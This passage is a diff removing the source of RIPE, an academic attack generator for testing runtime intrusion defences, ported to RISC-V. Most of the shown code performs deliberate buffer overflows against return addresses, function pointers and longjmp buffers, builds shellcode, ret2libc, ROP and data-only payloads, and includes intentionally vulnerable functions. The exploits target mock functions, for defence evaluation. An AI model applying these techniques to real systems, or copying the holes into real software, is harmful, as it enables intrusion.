buffer; - /* Address to target for direct (part of) overflow */ - void * target_addr; - /* JM: Address for second overflow (indirect ret2libc attack) */ - void * target_addr_aux; - /* Buffer for storing a generated format string */ - char format_string_buf[16]; - /* Attack payload */ - CHARPAYLOAD payload; - - /* Check that malloc went fine */ - if (heap_buffer1 == NULL || heap_buffer2 == NULL) { - printk("Unable to allocate heap memory."); - exit(1); - } - - // JM: assigning value to bss buffers - // to place them 'behind' other locals - bss_buffer[0] = 'a'; - strcpy(bss_secret, data_secret); - - // write shellcode with correct jump address - build_shellcode(shellcode_nonop); - - switch (attack.location) { - case STACK: - // NN: Special case for stack_struct - if (attack.code_ptr == STRUCT_FUNC_PTR_STACK && - attack.technique == DIRECT) - { - buffer = stack_struct.buffer; - } else if (attack.code_ptr == FUNC_PTR_STACK_PARAM && - attack.technique == DIRECT) - { - // JM: use buffer lower in memory for direct attack - set_low_buf(&buffer); - } else { - buffer = stack_buffer; - } - - // JM: enable data-only attack - if (attack.inject_param == DATA_ONLY) { - stack_mem_ptr = &stack_flag; - } - - // Also set the location of the function pointer and the - // longjmp buffer on the heap (the same since only choose one) - heap_func_ptr = (void *) heap_buffer1; - heap_jmp_buffer = (void *) heap_buffer1; - break; - case HEAP: - /* Injection into heap buffer */ - - // NN: Special case for heap_struct - if (attack.code_ptr == STRUCT_FUNC_PTR_HEAP && - attack.technique == DIRECT) - { - buffer = heap_struct->buffer; - break; - } - - if (((unsigned long) heap_buffer1 < (unsigned long) heap_buffer2) && - ((unsigned long) heap_buffer2 < (unsigned long) heap_buffer3)) - { - buffer = heap_buffer1; - // Set the location of the memory pointer on the heap - heap_mem_ptr_aux = (long *) heap_buffer2; - heap_mem_ptr = (long *) heap_buffer3; - - if (attack.code_ptr == VAR_LEAK) { - heap_secret = heap_buffer2; - strcpy(heap_secret, data_secret); - } - // Also set the location of the function pointer and the - // longjmp buffer on the heap (the same since only choose one) - heap_func_ptr = malloc(sizeof(void *)); - - // allocate the jump buffer - heap_jmp_buffer = (int *) malloc(sizeof(jmp_buf)); - } else { - if (output_debug_info) { - fprintf(stderr, - "Error: Heap buffers allocated in the wrong order.\n"); - } - - exit(1); - } - - // JM: set up heap ptr with DOP target - if (attack.inject_param == DATA_ONLY) { - heap_mem_ptr = heap_flag; - } - break; - case DATA: - /* Injection into data segment buffer */ - - // NN: Special case for stack_struct - if (attack.code_ptr == STRUCT_FUNC_PTR_DATA) { - buffer = data_struct.buffer; - break; - } - - if ((attack.code_ptr == FUNC_PTR_DATA || - attack.code_ptr == VAR_BOF) && - attack.technique == DIRECT) - { - buffer = data_buffer2; - } else { - buffer = data_buffer1; - } - - // JM: set up data ptr with DOP target - if (attack.inject_param == DATA_ONLY) { - data_flag = 0; - *data_mem_ptr = &data_flag; - } - // Also set the location of the function pointer and the - // longjmp buffer on the heap (the same since only choose one) - heap_func_ptr = (void *) heap_buffer1; - heap_jmp_buffer = heap_buffer1; - break; - case BSS: - /* Injection into BSS buffer */ - - // NN: Special case for bss_struct - if (attack.code_ptr == STRUCT_FUNC_PTR_BSS) { - buffer = bss_struct.buffer; - break; - } - - buffer = bss_buffer; - - bss_flag = 0; - - bss_mem_ptr_aux = &dummy_function; - bss_mem_ptr = &dummy_function; - - // JM: set up bss ptr with DOP target - if (attack.inject_param == DATA_ONLY) { - bss_mem_ptr = &bss_flag; - } - // Also set the location of the function pointer and the - // longjmp buffer on the heap (the same since only choose one) - heap_func_ptr = (void *) heap_buffer1; - break; - } - - // make sure we actually have an initialized function pointer on the heap - if (heap_func_ptr) - *heap_func_ptr = dummy_function; - - // Set Target Address - switch (attack.technique) { - case DIRECT: - switch (attack.code_ptr) { - case RET_ADDR: - target_addr = RET_ADDR_PTR; - break; - case FUNC_PTR_STACK_VAR: - target_addr = &stack_func_ptr; - break; - case FUNC_PTR_STACK_PARAM: - target_addr = &stack_func_ptr_param; - break; - case FUNC_PTR_HEAP: - target_addr = heap_func_ptr; - break; - case FUNC_PTR_BSS: - target_addr = &bss_func_ptr; - break; - case FUNC_PTR_DATA: - target_addr = &data_func_ptr; - break; - case LONGJMP_BUF_STACK_VAR: - target_addr = stack_jmp_buffer; - break; - case LONGJMP_BUF_STACK_PARAM: - target_addr = stack_jmp_buffer_param; - break; - case LONGJMP_BUF_HEAP: - target_addr = (void *) heap_jmp_buffer; - break; - case LONGJMP_BUF_DATA: - target_addr = data_jmp_buffer; - break; - case LONGJMP_BUF_BSS: - target_addr = bss_jmp_buffer; - break; - case STRUCT_FUNC_PTR_STACK: - target_addr = &stack_struct.func_ptr; - break; - case STRUCT_FUNC_PTR_HEAP: - target_addr = (void *) heap_struct + 256; - break; - case STRUCT_FUNC_PTR_DATA: - target_addr = &data_struct.func_ptr; - break; - case STRUCT_FUNC_PTR_BSS: - target_addr = &bss_struct.func_ptr; - break; - case VAR_BOF: - // JM: if data-only, location determines target - case VAR_IOF: - switch (attack.location) { - case STACK: - target_addr = &stack_flag; - break; - case HEAP: - target_addr = heap_flag; - break; - case DATA: - target_addr = &data_flag; - break; - case BSS: - target_addr = &bss_flag; - break; - } - break; - case VAR_LEAK: - switch (attack.location) { - case STACK: - target_addr = &stack_secret; - break; - case HEAP: - target_addr = heap_secret; - break; - case DATA: - target_addr = &data_secret; - break; - case BSS: - target_addr = &bss_secret; - break; - } - break; - - } - break; - - case INDIRECT: - switch (attack.location) { - case STACK: - target_addr = &stack_mem_ptr; - target_addr_aux = &stack_mem_ptr_aux; - break; - case HEAP: - target_addr = heap_mem_ptr; - target_addr_aux = heap_mem_ptr_aux; - break; - case DATA: - target_addr = &data_mem_ptr; - target_addr_aux = &data_mem_ptr_aux; - break; - case BSS: - target_addr = &bss_mem_ptr; - target_addr_aux = &bss_mem_ptr_aux; - break; - } - break; - } - - // set longjmp buffers - switch (attack.code_ptr) { - case LONGJMP_BUF_STACK_VAR: - if (setjmp(stack_jmp_buffer) != 0) { - /* setjmp() returns 0 if returning directly and non-zero when returning */ - /* from longjmp() using the saved context. Attack failed. */ - printf("Longjmp attack failed. Returning normally...\n"); - return; - } - payload.jmp_buffer = &stack_jmp_buffer; - break; - case LONGJMP_BUF_STACK_PARAM: - if (setjmp(stack_jmp_buffer_param) != 0) { - printf("Longjmp attack failed. Returning normally...\n"); - } - payload.jmp_buffer = &stack_jmp_buffer_param; - break; - case LONGJMP_BUF_HEAP: - if (setjmp(*heap_jmp_buffer) != 0) { - printf("Longjmp attack failed. Returning normally...\n"); - return; - } - payload.jmp_buffer = (void *) heap_jmp_buffer; - payload.stack_jmp_buffer_param = NULL; - break; - case LONGJMP_BUF_DATA: - if (setjmp(data_jmp_buffer) != 0) { - printf("Longjmp attack failed. Returning normally...\n"); - return; - } - payload.jmp_buffer = (void *) data_jmp_buffer; - payload.stack_jmp_buffer_param = NULL; - break; - case LONGJMP_BUF_BSS: - if (setjmp(bss_jmp_buffer) != 0) { - printf("Longjmp attack failed. Returning normally...\n"); - return; - } - payload.jmp_buffer = (void *) bss_jmp_buffer; - payload.stack_jmp_buffer_param = NULL; - break; - default: - break; - } - - payload.ptr_to_correct_return_addr = RET_ADDR_PTR; - - payload.inject_param = attack.inject_param; - - switch (attack.technique) { - case DIRECT: - switch (attack.inject_param) { - case RETURN_INTO_LIBC: - // JM: simulate ret2libc by invoking mock libc function - payload.overflow_ptr = &ret2libc_target; - break; - case RETURN_ORIENTED_PROGRAMMING: - // skip over the prologue code of rop_target - // to simulate return-oriented programming gadget - payload.overflow_ptr = (uintptr_t) &rop_target; - break; - case INJECTED_CODE_NO_NOP: - payload.overflow_ptr = buffer; - break; - case DATA_ONLY: - // JM: corrupt variable with nonzero value - payload.overflow_ptr = 0xdeadbeef; - break; - default: - if (output_debug_info) { - fprintf(stderr, "Unknown choice of attack code"); - exit(1); - } - } - break; - case INDIRECT: - /* Here payload.overflow_ptr will point to the final pointer target */ - /* since an indirect attack first overflows a general pointer that in */ - /* turn is dereferenced to overwrite the target pointer */ - switch (attack.code_ptr) { - case RET_ADDR: - payload.overflow_ptr = RET_ADDR_PTR; - break; - case FUNC_PTR_STACK_VAR: - payload.overflow_ptr = &stack_func_ptr; - break; - case FUNC_PTR_STACK_PARAM: - payload.overflow_ptr = &stack_func_ptr_param; - break; - case FUNC_PTR_HEAP: - payload.overflow_ptr = heap_func_ptr; - break; - case FUNC_PTR_BSS: - payload.overflow_ptr = &bss_func_ptr; - break; - case FUNC_PTR_DATA: - payload.overflow_ptr = &data_func_ptr; - break; - case STRUCT_FUNC_PTR_STACK: - payload.overflow_ptr = &stack_struct.func_ptr; - break; - case STRUCT_FUNC_PTR_HEAP: - payload.overflow_ptr = (void *) heap_struct + 256; - break; - case STRUCT_FUNC_PTR_DATA: - payload.overflow_ptr = &data_struct.func_ptr; - break; - case STRUCT_FUNC_PTR_BSS: - payload.overflow_ptr = &bss_struct.func_ptr; - break; - case LONGJMP_BUF_STACK_VAR: - payload.overflow_ptr = stack_jmp_buffer; - break; - case LONGJMP_BUF_STACK_PARAM: - payload.overflow_ptr = stack_jmp_buffer_param; - break; - case LONGJMP_BUF_HEAP: - payload.overflow_ptr = *heap_jmp_buffer; - break; - case LONGJMP_BUF_DATA: - payload.overflow_ptr = data_jmp_buffer; - break; - case LONGJMP_BUF_BSS: - payload.overflow_ptr = bss_jmp_buffer; - break; - // JM: indirect attacks don't apply to int overflows or leaks - case VAR_BOF: - case VAR_IOF: - case VAR_LEAK: - payload.overflow_ptr = &dop_dest; - break; - default: - if (output_debug_info) { - fprintf(stderr, - "Error: Unknown choice of code pointer\n"); - } - - exit(1); - break; - } - break; - } - - if (output_debug_info) { - fprintf(stderr, "target_addr == %p\n", target_addr); - fprintf(stderr, "buffer == %p\n", buffer); - } - - // ------------------------------------------------------ - /* Calculate payload size for overflow of chosen target address */ - if ((unsigned long) target_addr > (unsigned long) buffer) { - payload.size = - (unsigned int) ((unsigned long) target_addr + sizeof(long) - - (unsigned long) buffer - + 1); /* For null termination so that buffer can be */ - /* used with string functions in standard library */ - - if (output_debug_info) - fprintf(stderr, "payload size == %d\n", payload.size); - } else { - if (output_debug_info) - fprintf(stderr, "Error calculating size of payload\n"); - exit(1); - } - - /* Set first byte of buffer to null to allow concatenation functions to */ - /* start filling the buffer from that first byte */ - buffer[0] = '\0'; - - if (!build_payload(&payload)) { - if (output_debug_info) - fprintf(stderr, "Error: Could not build payload\n"); - exit(1); - } - - /****************************************/ - /* Overflow buffer with chosen function */ - /* Note: Here memory will be corrupted */ - /****************************************/ - - switch (attack.function) { - case MEMCPY: - // memcpy() shouldn't copy the terminating NULL, therefore - 1 - memcpy(buffer, payload.buffer, payload.size - 1); - break; - case STRCPY: - strcpy(buffer, payload.buffer); - break; - case STRNCPY: - strncpy(buffer, payload.buffer, payload.size); - break; - case SPRINTF: - sprintf(buffer, "%s", payload.buffer); - break; - case SNPRINTF: - snprintf(buffer, payload.size, "%s", payload.buffer); - break; - case STRCAT: - strcat(buffer, payload.buffer); - break; - case STRNCAT: - strncat(buffer, payload.buffer, payload.size); - break; - case SSCANF: - snprintf(format_string_buf, 15, "%%%ic", payload.size); - // Removed for now sscanf(payload.buffer, format_string_buf, buffer); - break; - case HOMEBREW: - homebrew_memcpy(buffer, payload.buffer, payload.size - 1); - break; - default: - if (output_debug_info) - fprintf(stderr, "Error: Unknown choice of function\n"); - exit(1); - break; - } - - /*******************************************/ - /* Ensure that code pointer is overwritten */ - /*******************************************/ - - switch (attack.technique) { - case DIRECT: - /* Code pointer already overwritten */ - break; - case INDIRECT: - // JM: zero out junk byte written to general pointer - if (attack.function == SSCANF) { - *(uint32_t *) target_addr <<= 8; - *(uint32_t *) target_addr >>= 8; - } - - if (attack.inject_param == RETURN_INTO_LIBC) { - // JM: auxilliary overflow to give attacker control of a second general ptr - payload.overflow_ptr = &ret2libc_target; - payload.size = (uintptr_t) target_addr_aux - - (uintptr_t) buffer + sizeof(long) + 1; - build_payload(&payload); - memcpy(buffer, payload.buffer, payload.size - 1); - printf("target_addr_aux: %p\n", target_addr_aux); - - switch (attack.location) { - case STACK: - *(uint32_t *) (*(uint32_t *) target_addr) = - (uintptr_t) stack_mem_ptr_aux; - break; - case HEAP: - *(uint32_t *) (*(uint32_t *) target_addr) = - (uintptr_t) *heap_mem_ptr_aux; - break; - case DATA: - *(uint32_t *) (*(uint32_t *) target_addr) = - (uintptr_t) *data_mem_ptr_aux; - break; - case BSS: - *(uint32_t *) (*(uint32_t *) target_addr) = - (uintptr_t) bss_mem_ptr_aux; - break; - } - } else if (attack.inject_param == INJECTED_CODE_NO_NOP) { - *(uintptr_t *) (*(uintptr_t *) target_addr) = - (uintptr_t) buffer; - } - break; - default: - if (output_debug_info) - fprintf(stderr, "Error: Unknown choice of attack parameterB\n"); - - exit(1); - break; - } - - printf(""); - printf("\nExecuting attack... "); - - switch (attack.code_ptr) { - case RET_ADDR: - break; - case FUNC_PTR_STACK_VAR: - stack_func_ptr(NULL); - break; - case FUNC_PTR_STACK_PARAM: - ((int (*)(char *, int))(*stack_func_ptr_param))(NULL, 0); - break; - case FUNC_PTR_HEAP: - ((int (*)(char *, int)) * heap_func_ptr)(NULL, 0); - break; - case FUNC_PTR_BSS: - ((int (*)(char *, int))(*bss_func_ptr))(NULL, 0); - break; - - case FUNC_PTR_DATA: - ((int (*)(char *, int))(*data_func_ptr))(NULL, 0); - break; - case LONGJMP_BUF_STACK_VAR: - lj_func(stack_jmp_buffer); - break; - case LONGJMP_BUF_STACK_PARAM: - lj_func(stack_jmp_buffer_param); - break; - case LONGJMP_BUF_HEAP: - lj_func(*heap_jmp_buffer); - break; - case LONGJMP_BUF_DATA: - lj_func(data_jmp_buffer); - break; - case LONGJMP_BUF_BSS: - lj_func(bss_jmp_buffer); - break; - case STRUCT_FUNC_PTR_STACK: - ((int (*)(char *, int)) * (stack_struct.func_ptr))(NULL, 0); - break; - case STRUCT_FUNC_PTR_HEAP: - (*heap_struct->func_ptr)(NULL, 0); - break; - case STRUCT_FUNC_PTR_DATA: - (*data_struct.func_ptr)(NULL, 0); - break; - case STRUCT_FUNC_PTR_BSS: - (*bss_struct.func_ptr)(NULL, 0); - break; - case VAR_BOF: - case VAR_IOF: - switch (attack.location) { - case STACK: - dop_target(buffer, *stack_mem_ptr); - break; - case HEAP: - dop_target(buffer, *heap_mem_ptr); - break; - case DATA: - dop_target(buffer, **data_mem_ptr); - break; - case BSS: - dop_target(buffer, *bss_mem_ptr); - break; - } - break; - case VAR_LEAK: - data_leak(buffer); - break; - } -} /* perform_attack */ - -/*******************/ -/* BUILD_PAYLOAD() */ -/*******************/ -boolean -build_payload(CHARPAYLOAD * payload) -{ - size_t size_shellcode, bytes_to_pad; - char * shellcode, * temp_char_buffer, * temp_char_ptr; - - /* Allocate payload buffer */ - payload->buffer = (char *) malloc(payload->size); - if (payload->buffer == NULL) { - if (output_debug_info) - printk("Unable to allocate payload buffer."); - return FALSE; - } - switch (attack.inject_param) { - case INJECTED_CODE_NO_NOP: - if (payload->size < (size_shellcode_nonop + sizeof(long))) { - return FALSE; - } - shellcode = shellcode_nonop; - size_shellcode = size_shellcode_nonop; - break; - case DATA_ONLY: - // JM: 256 padding bytes for unsigned 8bit IOF - if (attack.code_ptr == VAR_IOF) - payload->size = 256 + sizeof(long) + sizeof(char); - - if (attack.code_ptr == VAR_LEAK) { - // JM: simulated packet with length included - payload->size += 32 - sizeof(long); - payload->buffer[0] = payload->size & 0xFF; - payload->buffer[1] = payload->size / 0x100; - payload->buffer[2] = 'A'; - payload->buffer[3] = '\0'; - payload->size = 4; - return TRUE; - } - case RETURN_ORIENTED_PROGRAMMING: - case RETURN_INTO_LIBC: - if (payload->size < sizeof(long)) - return FALSE; - - size_shellcode = 0; - shellcode = "dummy"; - break; - } - - /* Copy shellcode into payload buffer */ - memcpy(payload->buffer, shellcode, size_shellcode); - - /* Calculate number of bytes to pad with */ - /* size - shellcode - target address - null terminator */ - bytes_to_pad = - (payload->size - size_shellcode - sizeof(long) - sizeof(char)); - - /* Pad payload buffer with dummy bytes */ - memset((payload->buffer + size_shellcode), 'A', bytes_to_pad); - - if (output_debug_info) { - fprintf(stderr, "bytes to pad: %d\n", bytes_to_pad); - fprintf(stderr, "\noverflow_ptr: %p\n", payload->overflow_ptr); - } - - /* Add the address to the direct or indirect target */ - if (attack.code_ptr != VAR_IOF) { - memcpy(&(payload->buffer[size_shellcode + bytes_to_pad]), - &payload->overflow_ptr, - sizeof(long)); - } - - /* Finally, add the terminating null character at the end */ - memset((payload->buffer + payload->size - 1), '\0', 1); - - if (output_debug_info) - fprintf(stderr, "payload: %s\n", payload->buffer); - return TRUE; - - -} /* build_payload */ - -// JM: call longjmp on a buffer in perform_attack() -void -lj_func(jmp_buf lj_buf) -{ - longjmp(lj_buf, 1111); -} - -void -homebrew_memcpy(void * dst, const void * src, size_t length) -{ - char * d, * s; - - d = (char *) dst; - s = (char *) src; - - while (length--) { - *d++ = *s++; - } -} - -void -shellcode_target() -{ - printf("success.\nCode injection function reached.\n"); - exit(0); -} - -void -ret2libc_target() -{ - printf("success.\nRet2Libc function reached.\n"); - exit(0); -} - -void -dop_target(char * buf, uint32_t auth) -{ - size_t auth_loc = auth; - - if (attack.code_ptr == VAR_IOF) { - iof(buf, &auth_loc); - } - - if (!auth_loc) { - printf("DOP attack failed\n"); - } else { - printf("success.\nDOP memory corruption reached.\n"); - exit(0); - } -} - -void -rop_target() -{ - printf("success.\nROP function reached.\n"); - exit(0); -} - -void -set_low_buf(char ** buf) -{ - char low_buf[1024]; - - if (output_debug_info) - fprintf(stderr, "Inside set_low_buf()\n"); - *buf = &low_buf; -} - -void -iof(char * buf, uint32_t iv) -{ - char * map; - uint32_t key = iv; - uint8_t len = strlen(buf); - - // 0-length allocation and vulenrable hash operations - map = (char *) malloc(len * sizeof(char)); - key -= (uint32_t) map; - key &= (uint16_t) len - 1; - map[key] = 0xa1; -} - -void -data_leak(char *buf) { - uint16_t size = buf[0] + (buf[1] * 0x100), i; - char *msg = (char *)malloc(size); - - memcpy(msg, buf + 2, size); - for (i = 0; i < size; i++) { - if (msg[i] >= 0x20) printf("%c",msg[i]); - } - - printf("\n"); -} - -/*********************/ -/* BUILD_SHELLCODE() */ -/*********************/ -void -build_shellcode(char * shellcode) -{ - char attack_addr[9], low_bits[4], high_bits[6]; // target address and its components - char lui_bin[33], addi_bin[33]; // binary insn encodings (as strings) - char lui_s[9], addi_s[9], * jalr_s = "000300e7"; // hex insn encodings - size_t lui_val, addi_val, jalr_val; // raw binary insn encodings - - memset(attack_addr, 0, sizeof(attack_addr) ); - memset(low_bits, 0, sizeof(low_bits) ); - memset(high_bits, 0, sizeof(high_bits) ); - memset(lui_bin, 0, sizeof(lui_bin) ); - memset(addi_bin, 0, sizeof(addi_bin) ); - memset(lui_s, 0, sizeof(lui_s) ); - memset(addi_s, 0, sizeof(addi_s) ); - - // fix shellcode when lower bits become negative - if (((unsigned long)&shellcode_target & 0x00000fff) >= 0x800) - hex_to_string(attack_addr, &shellcode_target + 0x1000); - else - hex_to_string(attack_addr, &shellcode_target); - - // split attack address into low and high bit strings - strncpy(low_bits, &attack_addr[5], 3); - strncpy(high_bits, attack_addr, 5); - - jalr_val = strtoul(jalr_s, 0, 16); - - // generate 20 imm bits for the LUI insn - for (int i = 0; i < 5; i++) { - strncat(lui_bin, hex_to_bin(high_bits[i]), 4); - } - - // append reg and opcode bits, then convert to raw binary - strncat(lui_bin, "001100110111", 12); - lui_val = strtoul(lui_bin, 0, 2); - - hex_to_string(lui_s, lui_val); - - // generate binary for ADDI insn - for (int i = 0; i < 3; i++) { - strncat(addi_bin, hex_to_bin(low_bits[i]), 4); - } - - strncat(addi_bin, "00110000001100010011", 20); - addi_val = strtoul(addi_bin, 0, 2); - - hex_to_string(addi_s, addi_val); - - format_instruction(shellcode, lui_val); - format_instruction(shellcode + 4, addi_val); - format_instruction(shellcode + 8, jalr_val); - - hex_to_string(lui_s, lui_val); - hex_to_string(addi_s, addi_val); - - if (output_debug_info) { - printf("----------------\nShellcode instructions:\n"); - printf("%s0x%-20s%14s\n", "lui t1, ", high_bits, lui_s); - printf("%s0x%-20s%10s\n", "addi t1, t1, ", low_bits, addi_s); - printf("%s%38s\n----------------\n", "jalr t1", jalr_s); - } -} /* build_shellcode */ - -// convert a 32-bit hex value to padded, 8-char string -void -hex_to_string(char * str, size_t val) -{ - // store value in string and prepend 0s as necessary - snprintf(str, 9, "%8x", val); - - for (int i = 0; i < 9; i++) { - if (str[i] == ' ') str[i] = '0'; - } -} - -// format instruction and append to destination string -void -format_instruction(char * dest, size_t insn) -{ - char insn_bytes[4]; - - insn_bytes[0] = (insn >> 24) & 0xff; - insn_bytes[1] = (insn >> 16) & 0xff; - insn_bytes[2] = (insn >> 8) & 0xff; - insn_bytes[3] = insn & 0xff; - - for (int i = 3; i >= 0; i--) { - dest[3 - i] = insn_bytes[i]; - } -} - -boolean -is_attack_possible() -{ - if ((attack.inject_param == INJECTED_CODE_NO_NOP) && - (!(attack.function == MEMCPY) && !(attack.function == HOMEBREW))) - { - fprintf(stderr, - "Error: Impossible to inject shellcode with string functions (for now)\n"); - return FALSE; - } - - if (attack.inject_param == RETURN_ORIENTED_PROGRAMMING && - attack.technique != DIRECT) - { - fprintf(stderr, - "Error: Impossible (theoretically) to perform indirect ROP attacks\n"); - return FALSE; - } - - if (attack.inject_param == DATA_ONLY) { - if (attack.code_ptr != VAR_BOF && - attack.code_ptr != VAR_IOF && - attack.code_ptr != VAR_LEAK) - { - fprintf(stderr, "Error: Misused DOP code pointer parameters.\n"); - return FALSE; - } - - if ((attack.code_ptr == VAR_LEAK || attack.code_ptr == VAR_IOF) && attack.technique == INDIRECT) { - fprintf(stderr, - "Error: Impossible to do an indirect int overflow attack.\n"); - return FALSE; - } - - if (attack.location == HEAP && attack.technique == INDIRECT) { - fprintf(stderr, - "Error: Impossible to indirect attack the heap flag.\n"); - return FALSE; - } - } else if (attack.code_ptr == VAR_BOF || - attack.code_ptr == VAR_IOF || - attack.code_ptr == VAR_LEAK) { - fprintf(stderr, - "Error: Must use \"dataonly\" injection parameter for DOP attacks.\n"); - return FALSE; - } - - // JM: attacks targeting another memory location must be indirect - switch (attack.location) { - case STACK: - if ((attack.technique == DIRECT)) { - if ((attack.code_ptr == FUNC_PTR_HEAP) || - (attack.code_ptr == FUNC_PTR_BSS) || - (attack.code_ptr == FUNC_PTR_DATA) || - (attack.code_ptr == LONGJMP_BUF_HEAP) || - (attack.code_ptr == LONGJMP_BUF_DATA) || - (attack.code_ptr == LONGJMP_BUF_BSS) || - (attack.code_ptr == STRUCT_FUNC_PTR_HEAP) || - (attack.code_ptr == STRUCT_FUNC_PTR_DATA) || - (attack.code_ptr == STRUCT_FUNC_PTR_BSS) ) - { - fprintf(stderr, - "Error: Impossible to perform a direct attack on the stack into another memory segment.\n"); - return FALSE; - } else if ((attack.code_ptr == FUNC_PTR_STACK_PARAM) && - ((attack.function == STRCAT) || - (attack.function == SNPRINTF) || - (attack.function == SSCANF) || - (attack.function == HOMEBREW))) - { - fprintf(stderr, - "Error: Impossible to attack the stack parameter directly with the following functions: strcat(), snprintf(), sscanf(), homebrew_memcpy()\n"); - return FALSE; - } - } - break; - - case HEAP: - if ((attack.technique == DIRECT) && - ((attack.code_ptr == RET_ADDR) || - (attack.code_ptr == FUNC_PTR_STACK_VAR) || - (attack.code_ptr == FUNC_PTR_STACK_PARAM) || - (attack.code_ptr == FUNC_PTR_BSS) || - (attack.code_ptr == FUNC_PTR_DATA) || - (attack.code_ptr == LONGJMP_BUF_STACK_VAR) || - (attack.code_ptr == LONGJMP_BUF_STACK_PARAM) || - (attack.code_ptr == LONGJMP_BUF_BSS) || - (attack.code_ptr == LONGJMP_BUF_DATA) || - (attack.code_ptr == STRUCT_FUNC_PTR_STACK) || - (attack.code_ptr == STRUCT_FUNC_PTR_DATA) || - (attack.code_ptr == STRUCT_FUNC_PTR_BSS) )) - { - fprintf(stderr, - "Error: Impossible to perform a direct attack on the heap into another memory segment.\n"); - return FALSE; - } - break; - - case DATA: - if ((attack.technique == DIRECT) && - ((attack.code_ptr == RET_ADDR) || - (attack.code_ptr == FUNC_PTR_STACK_VAR) || - (attack.code_ptr == FUNC_PTR_STACK_PARAM) || - (attack.code_ptr == FUNC_PTR_BSS) || - (attack.code_ptr == FUNC_PTR_HEAP) || - (attack.code_ptr == LONGJMP_BUF_STACK_VAR) || - (attack.code_ptr == LONGJMP_BUF_STACK_PARAM) || - (attack.code_ptr == LONGJMP_BUF_HEAP) || - (attack.code_ptr == LONGJMP_BUF_BSS) || - (attack.code_ptr == STRUCT_FUNC_PTR_STACK) || - (attack.code_ptr == STRUCT_FUNC_PTR_HEAP) || - (attack.code_ptr == STRUCT_FUNC_PTR_BSS) )) - { - fprintf(stderr, - "Error: Impossible to perform a direct attack on the data segment into another memory segment.\n"); - return FALSE; - } - break; - - - case BSS: - if ((attack.technique == DIRECT) && - ((attack.code_ptr == RET_ADDR) || - (attack.code_ptr == FUNC_PTR_STACK_VAR) || - (attack.code_ptr == FUNC_PTR_STACK_PARAM) || - (attack.code_ptr == FUNC_PTR_DATA) || - (attack.code_ptr == FUNC_PTR_HEAP) || - (attack.code_ptr == LONGJMP_BUF_STACK_VAR) || - (attack.code_ptr == LONGJMP_BUF_STACK_PARAM) || - (attack.code_ptr == LONGJMP_BUF_HEAP) || - (attack.code_ptr == LONGJMP_BUF_DATA) || - (attack.code_ptr == STRUCT_FUNC_PTR_STACK) || - (attack.code_ptr == STRUCT_FUNC_PTR_HEAP) || - (attack.code_ptr == STRUCT_FUNC_PTR_DATA) )) - { - fprintf(stderr, - "Error: Impossible to perform a direct attack on the bss into another memory segment.\n"); - return FALSE; - } else if ((attack.technique == INDIRECT) && - (attack.code_ptr == LONGJMP_BUF_HEAP) && - (!(attack.function == MEMCPY) && - !(attack.function == STRNCPY) && - !(attack.function == HOMEBREW))) - { - fprintf(stderr, - "Error: Impossible to perform BSS->Heap Longjmp attacks using string functions.\n"); - return FALSE; - } - break; - } - - return TRUE; -} /* is_attack_possible */ diff --git a/zephyr-docker/workspace/ripe/src/ripe_attack_generator.h b/zephyr-docker/workspace/ripe/src/ripe_attack_generator.h deleted file mode 100644 index 6c0e5756e..000000000 --- a/zephyr-docker/workspace/ripe/src/ripe_attack_generator.h +++ /dev/null @@ -1,189 +0,0 @@ -/* RIPE was originally developed by John Wilander (@johnwilander) - * and was debugged and extended by Nick Nikiforakis (@nicknikiforakis) - * - * The RISC-V port of RIPE was developed by John Merrill. - * - * Released under the MIT license (see file named LICENSE) - * - * This program is part the paper titled - * RIPE: Runtime Intrusion Prevention Evaluator - * Authored by: John Wilander, Nick Nikiforakis, Yves Younan, - * Mariam Kamkar and Wouter Joosen - * Published in the proceedings of ACSAC 2011, Orlando, Florida - * - * Please cite accordingly. - */ - -/** - * @author John Wilander - * 2007-01-16 - */ - -#ifndef RIPE_ATTACK_GENERATOR_H -#define RIPE_ATTACK_GENERATOR_H -/* -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -*/ -// ASA -#include -#include -#include -#include -#include - -#include -//#include - -#include "ripe_attack_parameters.h" -#define fprintf(dest,str...) printk(str) -#define printf(str...) printk(str) -// END ASA - -typedef int boolean; -enum booleans {FALSE=0, TRUE}; - -const char *bin4b[16] = {"0000", "0001", "0010", "0011", - "0100", "0101", "0110", "0111", - "1000", "1001", "1010", "1011", - "1100", "1101", "1110", "1111"}; - -typedef struct attack_form ATTACK_FORM; -struct attack_form { - enum techniques technique; - enum inject_params inject_param; - enum code_ptrs code_ptr; - enum locations location; - enum functions function; -}; - -typedef struct char_payload CHARPAYLOAD; -struct char_payload { - enum inject_params inject_param; - size_t size; - void *overflow_ptr; /* Points to code pointer (direct attack) */ - /* or general pointer (indirect attack) */ - char *buffer; - - jmp_buf *jmp_buffer; - - long stack_jmp_buffer_param; - size_t offset_to_copied_base_ptr; - size_t offset_to_fake_return_addr; - long *fake_return_addr; - long *ptr_to_correct_return_addr; -}; - -struct attackme { - char buffer[256]; - int (*func_ptr)(const char *, int); -}; - -/** - * main - * -t technique - * -i injection parameter (code + NOP / return-into-libc / param to system()) - * -c code pointer - * -l memory location - * -f function to overflow with - * -d output debug info - * -o set output stream - */ -// ASA int main(int argc, char **argv); -void main(void); - -void perform_attack( - int (*stack_func_ptr_param)(const char *), - jmp_buf stack_jmp_buffer_param); - -/* BUILD_PAYLOAD() */ -/* */ -/* Simplified example of payload (exact figures are just made up): */ -/* */ -/* size = 31 (the total payload size) */ -/* size_sc = 12 (size of shellcode incl NOP) */ -/* size_addr = 4 (size of address to code) */ -/* size_null = 1 (size of null termination) */ -/* */ -/* ------------ ----------------- ------------- - */ -/* | Shell code | Padded bytes | Address |N| */ -/* | including | | back to |u| */ -/* | optional | | NOP sled or |l| */ -/* | NOP sled | | shell code |l| */ -/* ------------ ----------------- ------------- - */ -/* | | | | | | | */ -/* 0 11 12 25 26 29 30 */ -/* / \ / \ \ */ -/* size_sc-1 size_sc / \ size-size_null */ -/* / \ */ -/* (size-1)-size_addr-size_null size-size_addr-size_null */ -/* */ -/* This means that we should pad with */ -/* size - size_sc - size_addr - size_null = 31-12-4-1 = 14 bytes */ -/* and start the padding at index size_sc */ -boolean build_payload(CHARPAYLOAD *payload); - -void set_technique(char *choice); -void set_inject_param(char *choice); -void set_code_ptr(char *choice); -void set_location(char *choice); -void set_function(char *choice); - -int dummy_function(const char *str) { - printf("Dummy function\n"); - return 0; -} - -boolean is_attack_possible(); -void homebrew_memcpy(void *dst, const void *src, size_t len); - -/* -RIPE shellcode uses the following instructions: -la , -jalr - -The first la instruction is disassembled to: -lui , -addi , , - -Thus, the shellcode follows the pattern -shown in 